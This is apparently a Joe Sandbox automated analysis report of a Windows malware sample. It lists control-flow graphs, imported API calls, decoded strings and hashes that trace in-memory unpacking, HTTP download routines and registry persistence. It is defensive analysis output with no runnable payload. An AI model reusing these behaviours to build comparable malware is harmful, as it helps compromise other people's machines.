                                                                                • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                                                • Opcode Fuzzy Hash: a0ff43f580afe8f3995dcde7a2644c92267f14c521f0fca859abd751efac2b0a
                                                                                • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 921 402950-402967 922 4029a9-4029bd call 408ec2 921->922 923 402969-402972 921->923 925 402974-402979 923->925 926 4029be-402a00 VirtualProtect 923->926 925->922 929 40297b-402980 925->929 926->922 928 402a02-402a24 GetLastError FormatMessageA 926->928 930 402a27-402a2c 928->930 931 402982-40298a 929->931 932 402996-4029a3 call 402c10 929->932 930->930 934 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 930->934 931->932 933 40298c-402994 931->933 936 4029a5 932->936 933->932 935 4029a8 933->935 935->922 936->935
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                                                • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                                                • LocalFree.KERNEL32(?), ref: 00402A67
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                                                • String ID: %s: %s$Error protecting memory page
                                                                                • API String ID: 839691724-1484484497
                                                                                • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                                • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                                                • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                                • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1026 401880-401943 InternetSetFilePointer InternetReadFile 1028 40197d-4019c0 call 40aa10 HttpQueryInfoA 1026->1028 1032 401d25-401d53 call 408ec2 1028->1032 1033 4019c6-4019f9 CoCreateInstance 1028->1033 1033->1032 1035 4019ff-401a06 1033->1035 1035->1032 1037 401a0c-401a3a 1035->1037 1038 401a40-401a45 1037->1038 1038->1038 1039 401a47-401b08 call 402470 MultiByteToWideChar call 409035 MultiByteToWideChar 1038->1039 1044 401b10-401b19 1039->1044 1044->1044 1045 401b1b-401bd9 call 402310 call 408ed0 1044->1045 1052 401c0a-401c0c 1045->1052 1053 401bdb-401bea 1045->1053 1056 401c12-401c19 1052->1056 1057 401d19-401d20 1052->1057 1054 401c00-401c07 call 409027 1053->1054 1055 401bec-401bfa 1053->1055 1054->1052 1055->1054 1058 401d56-401d5b call 40c26f 1055->1058 1056->1057 1060 401c1f-401c93 call 409035 1056->1060 1057->1032 1067 401c95-401ca3 1060->1067 1068 401cff-401d15 call 408ed0 1060->1068 1069 401ca5-401cdb call 409035 call 4014b0 call 408ed0 1067->1069 1070 401cdd 1067->1070 1068->1057 1073 401ce0-401cfc call 4014b0 1069->1073 1070->1073 1073->1068
                                                                                APIs
                                                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: FileInternet$PointerRead
                                                                                • String ID: text
                                                                                • API String ID: 3197321146-999008199
                                                                                • Opcode ID: 74c99a18c910dce1e6054f9d50f006690a9fa5816be1f98360e8e89f05aab892
                                                                                • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                                                • Opcode Fuzzy Hash: 74c99a18c910dce1e6054f9d50f006690a9fa5816be1f98360e8e89f05aab892
                                                                                • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1302 40ef0d-40ef1a call 41366f 1305 40ef3c-40ef48 call 40ef4f ExitProcess 1302->1305 1306 40ef1c-40ef2a GetPEB 1302->1306 1306->1305 1307 40ef2c-40ef36 GetCurrentProcess TerminateProcess 1306->1307 1307->1305
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                                                • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF36
                                                                                • ExitProcess.KERNEL32 ref: 0040EF48
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                                • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                                                • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                                • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D7A3E6
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 00D7A406
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2421354084.0000000000D79000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D79000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_d79000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 8e93a43244b899c94567347a15a9111dc3a3466c29e3c4ade3084d3db0ee0d60
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 59F06231100710ABD7202BFD988DB6E76E8EF89725F144628E64AD14C0EAB0EC458A72
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: emp$mixtwo
                                                                                • API String ID: 3472027048-2390925073
                                                                                • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                                • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                                                • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                                • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 4055c0-405667 call 40f20b call 40f042 Sleep call 402470 call 4038c0 138 405691-4056d2 call 402470 call 4038c0 129->138 139 405669-405675 129->139 151 405701-40570b 138->151 152 4056d4-4056e0 138->152 141 405687-40568e call 409027 139->141 142 405677-405685 139->142 141->138 142->141 144 4056f2 call 40c26f 142->144 150 4056f7-4056fe call 409027 144->150 150->151 156 405718-40571e 151->156 157 40570d-405716 151->157 152->150 154 4056e2-4056f0 152->154 154->144 154->150 158 405721-405723 156->158 157->158 159 405725-40572d 158->159 160 40574d-40576c call 408690 158->160 161 405730-405748 call 40f158 159->161 166 405a91-405ad8 call 408470 * 3 call 4064d0 call 408190 call 4022d0 call 408260 call 402200 160->166 167 405772-40580b call 40aa10 call 409035 call 40aa10 160->167 168 40574a 161->168 217 405bab-405bd6 call 406770 call 408150 call 4022d0 call 408260 call 402200 166->217 218 405ade-405aef call 4021b0 166->218 182 40580d-405821 call 409170 167->182 183 40584f-405856 167->183 168->160 182->183 191 405823-40584c call 409482 call 409126 182->191 186 405882-4058a0 183->186 187 405858-40587d 183->187 190 4058a3-4058a8 186->190 187->186 190->190 193 4058aa-405922 call 402470 call 408a60 190->193 191->183 206 405951-405969 193->206 207 405924-405930 193->207 211 405970-40598d 206->211 209 405932-405940 207->209 210 405947-40594e call 409027 207->210 209->210 213 405942 call 40c26f 209->213 210->206 215 4059a2-4059b0 call 401d60 211->215 216 40598f-405998 call 408ed0 211->216 213->210 231 405a45-405a4c Sleep 215->231 232 4059b6-4059dc 215->232 216->215 273 405caa-405cd5 call 406b10 call 408150 call 4022d0 call 408260 call 402200 217->273 274 405bdc-405c53 call 4067f0 call 408150 call 4022d0 call 402250 call 402200 call 406870 call 408170 call 4022d0 call 402250 call 402200 call 4068f0 call 4081b0 call 4022d0 call 408260 call 402200 217->274 229 405af1-405b49 call 406550 call 4081b0 call 4022d0 call 402250 call 402200 call 4065e0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->229 230 405b4e-405ba6 call 406660 call 4081b0 call 4022d0 call 402250 call 402200 call 4066f0 call 408170 call 4022d0 call 402250 call 402200 call 408440 218->230 344 406123-40627a call 4016b0 call 407c30 call 4081b0 call 4022d0 call 407bb0 call 408190 call 4022d0 call 407b10 call 4081e0 call 4022d0 call 408560 call 4085c0 call 408670 call 4085c0 call 408670 call 4085c0 call 402200 * 8 229->344 230->344 231->211 234 4059e0-4059e5 232->234 234->234 239 4059e7-405a0c call 402470 234->239 251 405a51-405a56 239->251 252 405a0e-405a11 239->252 260 405a58-405a5a 251->260 261 405a5c-405a5e 251->261 256 405a13-405a1a 252->256 257 405a6a-405a8c call 408440 call 402200 * 2 call 401710 252->257 256->231 264 405a1c-405a25 256->264 257->166 267 405a61-405a63 260->267 261->267 271 405a27-405a35 264->271 272 405a3b-405a42 call 409027 264->272 267->257 268 405a65 call 4037d0 267->268 268->257 271->144 271->272 272->231 326 405d99-405dc4 call 406eb0 call 408130 call 4022d0 call 408260 call 402200 273->326 327 405cdb-405d52 call 406b90 call 408150 call 4022d0 call 402250 call 402200 call 406c10 call 408170 call 4022d0 call 402250 call 402200 call 406c90 call 4081b0 call 4022d0 call 408260 call 402200 273->327 417 405c72-405c9d call 406a00 call 4081b0 call 4022d0 call 408260 call 402200 274->417 418 405c55 call 406980 274->418 373 405dca-405e67 call 406f30 call 408190 call 4022d0 call 402250 call 402200 call 406fb0 call 408170 call 4022d0 call 402250 call 402200 call 407030 call 408130 call 4022d0 call 402250 call 402200 call 4070b0 call 408230 call 4022d0 call 408260 call 402200 326->373 374 405eae-405ed9 call 4072d0 call 408100 call 4022d0 call 408260 call 402200 326->374 494 405d54-405d59 call 406d20 327->494 495 405d5e-405d89 call 406da0 call 4081b0 call 4022d0 call 408260 call 402200 327->495 635 406280-406299 call 4021f0 call 402070 344->635 626 405e73-405e9e call 4071c0 call 408230 call 4022d0 call 408260 call 402200 373->626 627 405e69-405e6e call 407140 373->627 431 405f59-405f84 call 4074f0 call 4081b0 call 4022d0 call 408260 call 402200 374->431 432 405edb-405f54 call 407360 call 408170 call 4022d0 call 402250 call 402200 call 4073e0 call 4081b0 call 4022d0 call 402250 call 402200 call 407470 call 408130 call 4022d0 call 402250 call 402200 374->432 417->344 497 405ca3-405ca8 call 406a90 417->497 430 405c5a-405c6d call 408190 call 4022d0 418->430 468 406115-40611e call 402250 call 402200 430->468 506 406004-40602f call 407700 call 408200 call 4022d0 call 408260 call 402200 431->506 507 405f86-405fff call 407580 call 408170 call 4022d0 call 402250 call 402200 call 407600 call 408190 call 4022d0 call 402250 call 402200 call 407680 call 408130 call 4022d0 call 402250 call 402200 431->507 432->344 468->344 494->430 495->344 563 405d8f-405d94 call 406e30 495->563 497->430 577 406031-406082 call 407790 call 408170 call 4022d0 call 402250 call 402200 call 407810 call 408130 call 4022d0 call 402250 call 402200 call 407890 506->577 578 406084-4060af call 407910 call 408130 call 4022d0 call 408260 call 402200 506->578 507->344 563->326 702 406102-406112 call 408130 call 4022d0 577->702 578->344 646 4060b1-4060fd call 407990 call 408170 call 4022d0 call 402250 call 402200 call 407a10 call 408190 call 4022d0 call 402250 call 402200 call 407a90 578->646 626->344 687 405ea4-405ea9 call 407250 626->687 627->626 658 4062d9-4062e0 Sleep 635->658 659 40629b-4062be call 4020b0 call 4022d0 call 4025c0 635->659 646->702 658->635 694 4062c0-4062cf call 4025c0 659->694 695 4062e2-406341 call 402200 call 408490 * 3 call 404ac0 659->695 687->374 694->695 708 4062d1-4062d4 call 402200 694->708 728 406343-406352 call 408490 call 403940 695->728 729 40635a-406385 call 407cc0 call 408200 call 4022d0 call 408260 call 402200 695->729 702->468 708->658 736 406357 728->736 744 406420-406451 call 407e30 call 4081b0 call 4022d0 call 408260 call 402200 729->744 745 40638b-4063bb call 4016b0 call 407d50 call 4080b0 call 4022d0 729->745 736->729 766 406453-4064b8 call 407fa0 call 408190 call 4022d0 call 407f20 call 408190 call 4022d0 call 407ec0 call 408090 call 4022d0 call 405460 744->766 767 4064bb-4064c0 call 4037d0 744->767 762 4063c0-4063d6 call 4021f0 call 402070 745->762 776 4063e7-406404 call 4020b0 call 4022d0 call 402200 762->776 777 4063d8-4063e3 Sleep 762->777 766->767 782 406409-40641b call 402200 call 401710 776->782 777->762 779 4063e5 777->779 779->782 782->744
                                                                                APIs
                                                                                • Sleep.KERNEL32(000005DC,?,756CD120), ref: 00405620
                                                                                • __Init_thread_footer.LIBCMT ref: 00405847
                                                                                • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                                                  • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                                                  • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                                                  • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                                                  • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                                                  • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                                                • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                                                • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                                                  • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                                                  • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                                                  • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                                                  • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                                                  • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                                                  • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                                                  • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                                                • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                                                • API String ID: 2078494684-1136066708
                                                                                • Opcode ID: 7fba9629649c4136d0b733ee673e7c0618d10c2ff9c61210964d837162572417
                                                                                • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                                                • Opcode Fuzzy Hash: 7fba9629649c4136d0b733ee673e7c0618d10c2ff9c61210964d837162572417
                                                                                • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                                                • __cftof.LIBCMT ref: 10001624
                                                                                • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                                                • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                                                • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                                                • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                                                • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                                                • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                                                • String ID: GET$http://
                                                                                • API String ID: 1233269984-1632879366
                                                                                • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                                                • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                                                • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                                                • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                                                                  • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                                                                Strings
                                                                                • GET, xrefs: 00401F81
                                                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                                                                • text, xrefs: 00401B5C
                                                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                                                                • API String ID: 2146599340-3782612381
                                                                                • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                                • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                                                                • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                                                                • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 942 4b4003c-4b40047 943 4b4004c-4b40263 call 4b40a3f call 4b40e0f call 4b40d90 VirtualAlloc 942->943 944 4b40049 942->944 959 4b40265-4b40289 call 4b40a69 943->959 960 4b4028b-4b40292 943->960 944->943 965 4b402ce-4b403c2 VirtualProtect call 4b40cce call 4b40ce7 959->965 962 4b402a1-4b402b0 960->962 964 4b402b2-4b402cc 962->964 962->965 964->962 971 4b403d1-4b403e0 965->971 972 4b403e2-4b40437 call 4b40ce7 971->972 973 4b40439-4b404b8 VirtualFree 971->973 972->971 975 4b405f4-4b405fe 973->975 976 4b404be-4b404cd 973->976 979 4b40604-4b4060d 975->979 980 4b4077f-4b40789 975->980 978 4b404d3-4b404dd 976->978 978->975 984 4b404e3-4b40505 LoadLibraryA 978->984 979->980 985 4b40613-4b40637 979->985 982 4b407a6-4b407b0 980->982 983 4b4078b-4b407a3 980->983 986 4b407b6-4b407cb 982->986 987 4b4086e-4b408be LoadLibraryA 982->987 983->982 988 4b40517-4b40520 984->988 989 4b40507-4b40515 984->989 990 4b4063e-4b40648 985->990 991 4b407d2-4b407d5 986->991 994 4b408c7-4b408f9 987->994 992 4b40526-4b40547 988->992 989->992 990->980 993 4b4064e-4b4065a 990->993 995 4b40824-4b40833 991->995 996 4b407d7-4b407e0 991->996 997 4b4054d-4b40550 992->997 993->980 998 4b40660-4b4066a 993->998 1001 4b40902-4b4091d 994->1001 1002 4b408fb-4b40901 994->1002 1000 4b40839-4b4083c 995->1000 1003 4b407e4-4b40822 996->1003 1004 4b407e2 996->1004 1005 4b40556-4b4056b 997->1005 1006 4b405e0-4b405ef 997->1006 999 4b4067a-4b40689 998->999 1009 4b40750-4b4077a 999->1009 1010 4b4068f-4b406b2 999->1010 1000->987 1011 4b4083e-4b40847 1000->1011 1002->1001 1003->991 1004->995 1007 4b4056d 1005->1007 1008 4b4056f-4b4057a 1005->1008 1006->978 1007->1006 1012 4b4057c-4b40599 1008->1012 1013 4b4059b-4b405bb 1008->1013 1009->990 1014 4b406b4-4b406ed 1010->1014 1015 4b406ef-4b406fc 1010->1015 1016 4b40849 1011->1016 1017 4b4084b-4b4086c 1011->1017 1025 4b405bd-4b405db 1012->1025 1013->1025 1014->1015 1019 4b406fe-4b40748 1015->1019 1020 4b4074b 1015->1020 1016->987 1017->1000 1019->1020 1020->999 1025->997
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2422800869.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_4b40000_dI3n4LSHB7.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1082 10001175-100011a6 call 1000e8e7 1085 100011a8-100011bd call 1000270d 1082->1085 1086 100011bf 1082->1086 1088 100011c5-100011dd InternetSetFilePointer 1085->1088 1086->1088 1090 100011e3-1000121b InternetReadFile 1088->1090 1091 10001253-1000125a 1090->1091 1092 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1090->1092 1093 10001260-100012a0 call 10003c40 HttpQueryInfoA 1091->1093 1094 1000125c-1000125e 1091->1094 1092->1091 1100 100012a6-100012d2 CoCreateInstance 1093->1100 1101 1000150a-10001520 call 1000e8a5 1093->1101 1094->1090 1094->1093 1100->1101 1103 100012d8-100012df 1100->1103 1103->1101 1107 100012e5-10001316 call 1000184b call 10001006 1103->1107 1113 10001318 1107->1113 1114 1000131a-10001351 call 10001c08 call 10001bb9 1107->1114 1113->1114 1120 10001357-1000135e 1114->1120 1121 100014fe-10001505 1114->1121 1120->1121 1122 10001364-100013cc call 1000270d 1120->1122 1121->1101 1126 100013d2-100013e8 1122->1126 1127 100014e6-100014f9 call 10002724 1122->1127 1129 10001486-10001497 1126->1129 1130 100013ee-1000141d call 1000270d 1126->1130 1127->1121 1131 10001499-1000149b 1129->1131 1132 100014dc-100014e4 1129->1132 1141 1000146e-10001483 call 10002724 1130->1141 1142 1000141f-10001421 1130->1142 1135 100014aa-100014ac 1131->1135 1136 1000149d-100014a8 call 10005926 1131->1136 1132->1127 1139 100014c0-100014d1 call 10003c40 call 10005926 1135->1139 1140 100014ae-100014be call 100050e0 1135->1140 1152 100014d7 call 1000584c 1136->1152 1139->1152 1140->1132 1141->1129 1143 10001423-10001425 1142->1143 1144 10001434-10001447 call 10003c40 1142->1144 1143->1144 1149 10001427-10001432 call 100050e0 1143->1149 1161 10001456-1000145c 1144->1161 1162 10001449-10001454 call 10005926 1144->1162 1149->1141 1152->1132 1161->1141 1164 1000145e-10001463 call 10005926 1161->1164 1167 10001469 call 1000584c 1162->1167 1164->1167 1167->1141
                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                                                • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                                                • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2423917899.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.2423894296.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423948703.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2423983729.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
